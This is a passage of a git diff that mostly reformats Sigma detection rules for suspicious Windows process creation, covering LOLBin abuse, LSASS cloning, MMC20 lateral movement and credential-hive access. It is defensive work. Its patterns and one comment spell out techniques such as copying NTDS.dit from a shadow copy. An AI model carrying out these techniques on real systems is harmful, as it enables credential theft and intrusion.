- - LocalCommand + - CommandLine|contains: ProxyCommand= + - CommandLine|contains|all: + - PermitLocalCommand + - LocalCommand condition: process_creation and (selection_parent or all of selection_cli_*) falsepositives: - Legitimate usage for administration purposes diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml index 7e7079bfb..331b421e1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml @@ -1,8 +1,7 @@ title: Suspicious LOLBIN AccCheckConsole id: 0f6da907-5854-4be6-859a-e9958747b0aa status: test -description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as - used to load an arbitrary DLL +description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL references: - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - https://twitter.com/bohops/status/1477717351017680899?s=12 @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \AccCheckConsole.exe - - OriginalFileName: AccCheckConsole.exe + - NewProcessName|endswith: \AccCheckConsole.exe + - OriginalFileName: AccCheckConsole.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -window ' - .dll condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml index fedb9a36d..13398bd7c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: start - NewProcessName|endswith: AtBroker.exe + CommandLine|contains: start + NewProcessName|endswith: AtBroker.exe filter: - CommandLine|contains: + CommandLine|contains: - animations - audiodescription - caretbrowsing diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml index e7e49cbb4..3d3d3ac0a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml @@ -1,8 +1,7 @@ title: Suspicious Certreq Command to Download id: 4480827a-9799-4232-b2c4-ccc6c4e9e12b status: test -description: Detects a suspicious certreq execution taken from the LOLBAS examples, - which can be abused to download (small) files +description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files references: - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ author: Christian Burkard (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certreq.exe - - OriginalFileName: CertReq.exe + - NewProcessName|endswith: \certreq.exe + - OriginalFileName: CertReq.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -Post ' - ' -config ' - ' http' diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml index f5fc85333..bf5264c0d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml @@ -1,8 +1,7 @@ title: Suspicious Driver Install by pnputil.exe id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 status: test -description: Detects when a possible suspicious driver is being installed via pnputil.exe - lolbin +description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin references: - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html @@ -20,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - -i - /install - -a - /add-driver - '.inf' - NewProcessName|endswith: \pnputil.exe + NewProcessName|endswith: \pnputil.exe condition: process_creation and selection fields: - SubjectUserName @@ -35,9 +34,7 @@ fields: - ParentCommandLine falsepositives: - Pnputil.exe being used may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making - changes in your environment. - - Pnputil.exe being executed from unfamiliar users should be investigated. If - known behavior is causing false positives, it can be exempted from the rule. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml index 1d4f32792..57d23131f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \DXCap.exe - - OriginalFileName: DXCap.exe + - NewProcessName|endswith: \DXCap.exe + - OriginalFileName: DXCap.exe selection_cli: - CommandLine|contains: ' -c ' + CommandLine|contains: ' -c ' # The ".exe" is not required to run the binary condition: process_creation and (all of selection*) falsepositives: - Legitimate execution of dxcap.exe by legitimate user diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml index 70645295a..c8435810f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml @@ -1,8 +1,7 @@ title: Suspicious GrpConv Execution id: f14e169e-9978-4c69-acb3-1cff8200bc36 status: test -description: Detects the suspicious execution of a utility to convert Windows 3.x - .grp files or for persistence purposes by malicious software or actors +description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors references: - https://twitter.com/0gtweet/status/1526833181831200770 author: Florian Roth (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - grpconv.exe -o - grpconv -o condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml index 38882e4f8..25d3dd93b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - '0x0110' - 0x01100:40 - NewProcessName|endswith: \sqldumper.exe + NewProcessName|endswith: \sqldumper.exe condition: process_creation and selection falsepositives: - Legitimate MSSQL Server actions diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml index a33c2e6c7..3e462d71d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml @@ -1,8 +1,8 @@ title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code id: fbd7c32d-db2a-4418-b92c-566eb8911133 related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: obsoletes + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: obsoletes status: test description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. references: @@ -22,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \SyncAppvPublishingServer.exe - - OriginalFileName: syncappvpublishingserver.exe + - NewProcessName|endswith: \SyncAppvPublishingServer.exe + - OriginalFileName: syncappvpublishingserver.exe selection_cli: - CommandLine|contains: '"n; ' + CommandLine|contains: '"n; ' condition: process_creation and (all of selection_*) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml index f02916486..525e10cef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml @@ -20,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \SyncAppvPublishingServer.vbs - - ; + - ; # at a minimum, a semi-colon is required condition: process_creation and selection fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml index 4568915cb..53c90794c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_tracker.yml @@ -18,15 +18,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \tracker.exe - - Description: Tracker + - NewProcessName|endswith: \tracker.exe + - Description: Tracker selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /d ' - ' /c ' filter_msbuild1: - CommandLine|contains: ' /ERRORREPORT:PROMPT ' + CommandLine|contains: ' /ERRORREPORT:PROMPT ' filter_msbuild2: + # Example: + # GrandparentImage: C:\Program Files\Microsoft Visual Studio\2022\Community\Msbuild\Current\Bin\MSBuild.exe + # ParentCommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" /nologo /nodemode:1 /nodeReuse:true /low:false + # CommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Tracker.exe" @"C:\Users\user\AppData\Local\Temp\tmp05c7789bc5534838bf96d7a0fed1ffff.tmp" /c "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.29.30133\bin\HostX86\x64\Lib.exe" ParentProcessName|endswith: - \Msbuild\Current\Bin\MSBuild.exe - \Msbuild\Current\Bin\amd64\MSBuild.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml index 1ec15ad8a..ddb49e707 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml @@ -1,8 +1,7 @@ title: Use of TTDInject.exe id: b27077d6-23e6-45d2-81a0-e2b356eea5fd status: test -description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 - and newer to debug time travel (underlying call of tttracer.exe) +description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) references: - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/ author: frack113 @@ -18,8 +17,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: ttdinject.exe - - OriginalFileName: TTDInject.EXE + - NewProcessName|endswith: ttdinject.exe + - OriginalFileName: TTDInject.EXE condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml index aa3ac6653..40eece5ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml @@ -1,16 +1,15 @@ title: Time Travel Debugging Utility Usage id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a related: - - id: e76c8240-d68f-4773-8880-5c6f63595aaf - type: derived + - id: e76c8240-d68f-4773-8880-5c6f63595aaf + type: derived status: test -description: Detects usage of Time Travel Debugging Utility. Adversaries can execute - malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ - https://twitter.com/mattifestation/status/1196390321783025666 - https://twitter.com/oulusoyum/status/1191329746069655553 -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/06 modified: 2022/10/09 tags: diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml index 385acf5ef..ec4afbed0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_type.yml @@ -1,8 +1,7 @@ title: Potential Download/Upload Activity Using Type Command id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f status: test -description: Detects usage of the "type" command to download/upload data from WebDAV - server +description: Detects usage of the "type" command to download/upload data from WebDAV server references: - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 author: Nasreddine Bencherchali (Nextron Systems) @@ -14,17 +13,18 @@ logsource: product: windows category: process_creation detection: + # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a "/c" command process_creation: EventID: 4688 Channel: Security selection_upload: - CommandLine|contains|all: + CommandLine|contains|all: - 'type ' - ' > \\\\' selection_download: - CommandLine|contains|all: + CommandLine|contains|all: - type \\\\ - - ' > ' + - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml index 74bc90ca8..23e195abf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml @@ -1,8 +1,7 @@ title: Lolbin Unregmp2.exe Use As Proxy id: 727454c0-d851-48b0-8b89-385611ab0704 status: test -description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom - version of "wmpnscfg.exe" +description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" references: - https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/ author: frack113 @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \unregmp2.exe - - OriginalFileName: unregmp2.exe + - NewProcessName|endswith: \unregmp2.exe + - OriginalFileName: unregmp2.exe selection_cmd: - CommandLine|contains: ' /HideWMP' + CommandLine|contains: ' /HideWMP' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml index e6f4e8081..15ba6e467 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml @@ -1,8 +1,7 @@ title: UtilityFunctions.ps1 Proxy Dll id: 0403d67d-6227-4ea8-8145-4e72db7da120 status: test -description: Detects the use of a Microsoft signed script executing a managed DLL - with PowerShell. +description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. references: - https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/ author: frack113 @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - UtilityFunctions.ps1 - 'RegSnapin ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml index 79e95ba4b..6eb69c057 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml @@ -1,11 +1,10 @@ title: Visual Basic Command Line Compiler Usage id: 7b10f171-7f04-47c7-9fa2-5be43c76e535 status: test -description: Detects successful code compilation via Visual Basic Command Line Compiler - that utilizes Windows Resource to Object Converter. +description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. references: - https://lolbas-project.github.io/lolbas/Binaries/Vbc/ -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/07 modified: 2021/11/27 tags: @@ -20,7 +19,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \vbc.exe - NewProcessName|endswith: \cvtres.exe + NewProcessName|endswith: \cvtres.exe condition: process_creation and selection falsepositives: - Utilization of this tool should not be seen in enterprise environment diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml index 95081903f..292fdaa96 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml @@ -1,8 +1,7 @@ title: Use of VisualUiaVerifyNative.exe id: b30a8bc5-e21b-4ca2-9420-0a94019ac56a status: test -description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass - and is listed in Microsoft's recommended block rules. +description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules @@ -21,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \VisualUiaVerifyNative.exe - - OriginalFileName: VisualUiaVerifyNative.exe + - NewProcessName|endswith: \VisualUiaVerifyNative.exe + - OriginalFileName: VisualUiaVerifyNative.exe condition: process_creation and selection falsepositives: - Legitimate testing of Microsoft UI parts. diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml index 47c845316..194f88375 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml @@ -1,8 +1,7 @@ title: Use of VSIISExeLauncher.exe id: 18749301-f1c5-4efc-a4c3-276ff1f5b6f8 status: test -description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can - be used to execute arbitrary binaries +description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \VSIISExeLauncher.exe - - OriginalFileName: VSIISExeLauncher.exe + - NewProcessName|endswith: \VSIISExeLauncher.exe + - OriginalFileName: VSIISExeLauncher.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -p ' - ' -a ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml index 5c16bae45..74ee4d8f9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_wfc.yml @@ -1,8 +1,7 @@ title: Use of Wfc.exe id: 49be8799-7b4d-4fda-ad23-cafbefdebbc5 status: test -description: The Workflow Command-line Compiler can be used for AWL bypass and is - listed in Microsoft's recommended block rules. +description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules @@ -19,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \wfc.exe - - OriginalFileName: wfc.exe + - NewProcessName|endswith: \wfc.exe + - OriginalFileName: wfc.exe condition: process_creation and selection falsepositives: - Legitimate use by a software developer diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml index 66d166056..835717f5c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml @@ -18,24 +18,24 @@ detection: EventID: 4688 Channel: Security selection_child_img: - - NewProcessName|endswith: \wlrmdr.exe - - OriginalFileName: WLRMNDR.EXE + - NewProcessName|endswith: \wlrmdr.exe + - OriginalFileName: WLRMNDR.EXE selection_child_cli: - CommandLine|contains|all: + CommandLine|contains|all: + # Note that the dash "-" can be replaced with a slash "/" (TODO: Use the "windash" modifier when it's introduced) - '-s ' - '-f ' - '-t ' - '-m ' - '-a ' - '-u ' - selection_parent: + selection_parent: # This selection is looking for processes spawned from wlrmdr using the "-u" flag ParentProcessName|endswith: \wlrmdr.exe filter: ParentProcessName: C:\Windows\System32\winlogon.exe filter_null: ParentProcessName: '-' - condition: process_creation and (selection_parent or (all of selection_child_* - and not 1 of filter*)) + condition: process_creation and (selection_parent or (all of selection_child_* and not 1 of filter*)) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml index 363b134c2..83f792d12 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml @@ -1,8 +1,7 @@ title: Microsoft Workflow Compiler Execution id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d status: test -description: Detects invocation of Microsoft Workflow Compiler, which may permit the - execution of arbitrary unsigned code. +description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. references: - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md @@ -23,8 +22,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Microsoft.Workflow.Compiler.exe - - OriginalFileName: Microsoft.Workflow.Compiler.exe + - NewProcessName|endswith: \Microsoft.Workflow.Compiler.exe + - OriginalFileName: Microsoft.Workflow.Compiler.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml b/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml index 153a3785c..50b9312d7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolscript_register_app.yml @@ -1,10 +1,7 @@ title: Potential Register_App.Vbs LOLScript Abuse id: 28c8f68b-098d-45af-8d43-8089f3e35403 status: test -description: Detects potential abuse of the "register_app.vbs" script that is part - of the Windows SDK. The script offers the capability to register new VSS/VDS Provider - as a COM+ application. Attackers can use this to install malicious DLLs for persistence - and execution. +description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. references: - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 - https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs @@ -22,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \cscript.exe - - \wscript.exe - - OriginalFileName: - - cscript.exe - - wscript.exe + - NewProcessName|endswith: + - \cscript.exe + - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe selection_cli: - CommandLine|contains: '.vbs -register ' + CommandLine|contains: '.vbs -register ' # register_app.vbs condition: process_creation and (all of selection*) falsepositives: - Other VB scripts that leverage the same starting command line flags diff --git a/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml b/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml index 789d0e653..a01e219ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lsass_process_clone.yml @@ -1,8 +1,7 @@ title: Potential Credential Dumping Via LSASS Process Clone id: c8da0dfd-4ed0-4b68-962d-13c9c884384e status: test -description: Detects a suspicious LSASS process process clone that could be a sign - of credential dumping activity +description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity references: - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/ - https://twitter.com/Hexacorn/status/1420053502554951689 @@ -23,7 +22,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \Windows\System32\lsass.exe - NewProcessName|endswith: \Windows\System32\lsass.exe + NewProcessName|endswith: \Windows\System32\lsass.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml index f8e9752cc..b79af1076 100644 --- a/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml @@ -1,8 +1,7 @@ title: Sensitive Registry Access via Volume Shadow Copy id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d status: test -description: Detects a command that accesses password storing registry hives via volume - shadow backups +description: Detects a command that accesses password storing registry hives via volume shadow backups references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection @@ -21,9 +20,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy + # copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1 + # There is an additional "\" to escape the special "?" + CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy selection_2: - CommandLine|contains: + CommandLine|contains: - \\NTDS.dit - \\SYSTEM - \\SECURITY diff --git a/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml b/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml index 73f9dccfe..a4ce1abec 100644 --- a/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_malware_script_dropper.yml @@ -17,14 +17,14 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - C:\Users\ - C:\ProgramData\ - NewProcessName|endswith: + NewProcessName|endswith: - \wscript.exe - \cscript.exe selection2: - CommandLine|contains: + CommandLine|contains: - .jse - .vbe - .js diff --git a/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml index 476d3fffc..5b89389a2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mftrace_child_process.yml @@ -1,8 +1,7 @@ title: Potential Mftrace.EXE Abuse id: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e status: experimental -description: Detects child processes of the "Trace log generation tool for Media Foundation - Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. +description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml index 90c113b87..1a7b32b97 100644 --- a/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml +++ b/sigma/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml @@ -1,9 +1,7 @@ title: MMC20 Lateral Movement id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd status: test -description: Detects MMC20.Application Lateral Movement; specifically looks for the - spawning of the parent MMC.exe with a command line of "-Embedding" as a child - of svchost.exe +description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe references: - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing @@ -21,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: -Embedding + CommandLine|contains: -Embedding ParentProcessName|endswith: \svchost.exe - NewProcessName|endswith: \mmc.exe + NewProcessName|endswith: \mmc.exe condition: process_creation and selection falsepositives: - Unlikely diff --git 